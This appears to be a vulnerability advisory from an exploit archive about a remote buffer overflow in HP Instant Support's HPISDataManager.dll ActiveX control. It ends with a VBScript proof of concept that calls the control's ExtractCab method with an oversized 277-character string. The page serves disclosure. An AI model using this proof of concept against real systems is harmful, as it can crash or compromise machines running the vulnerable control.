11 lines
No EOL
1.3 KiB
XML
11 lines
No EOL
1.3 KiB
XML
source: https://www.securityfocus.com/bid/29529/info
|
|
|
|
HP Instant Support 'HPISDataManager.dll' ActiveX control is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
|
|
|
|
An attacker can exploit this issue to execute arbitrary code in the context of an application using the ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.
|
|
|
|
HP Instant Support 1.0.0.22 and earlier versions are affected.
|
|
|
|
NOTE: This issue was previously covered in BID 29526 (HP Instant Support 'HPISDataManager.dll' ActiveX Control Unspecified Code Execution Vulnerabilities), but has been given its own record because of new information.
|
|
|
|
<?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' /> <script language='vbscript'> 'for debugging/custom prolog targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll" prototype = "Function ExtractCab ( ByVal filepath As String , ByVal destpath As String ) As String" memberName = "ExtractCab" progid = "HPISDataManagerLib.Datamgr" argCount = 2 arg1=String(277, "B") arg2="defaultV" target.ExtractCab arg1 ,arg2 </script></job></package> |